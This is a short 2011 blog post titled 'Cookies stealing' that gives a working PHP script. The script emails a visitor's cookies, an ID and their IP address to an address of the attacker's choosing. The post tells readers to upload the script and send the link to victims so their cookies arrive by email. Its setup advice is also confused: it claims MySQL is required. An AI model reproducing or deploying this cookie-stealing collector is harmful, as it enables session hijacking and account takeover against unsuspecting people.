Geo Urdu News

Cookies stealing

Monday, February 28, 2011


Cookie StealingThis is a featured page

For php mail sender download mysql it is a s/w like .RAR file...
if you don't have mysql then .PHP file will not work in ur pc...
1.Download mysql...ask ne for the link....or find in google...
2.Copy the code and paste in notepad and save as extention.PHP
The code is given here:-

$to="myemail@yahoo.com";
$subject="ID: ".$_GET["id"];
$message="ID: ".$_GET["id"]."\nCookies: \n".$_GET["cookie"]."\nIp: ".$_SERVER["REMOTE_ADDR"];
mail($to,$subject,$message, "From: cookies@lod.com");

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

?>


3.now upload on the internet...and as u give that link to anyone as he opens that link his/her coockies u will get it on ur mail......

EDIT THE 1st LINE AS YOUR E-MAIL THERE....THIS LINE-$to="myemail@yahoo.com";

0 comments: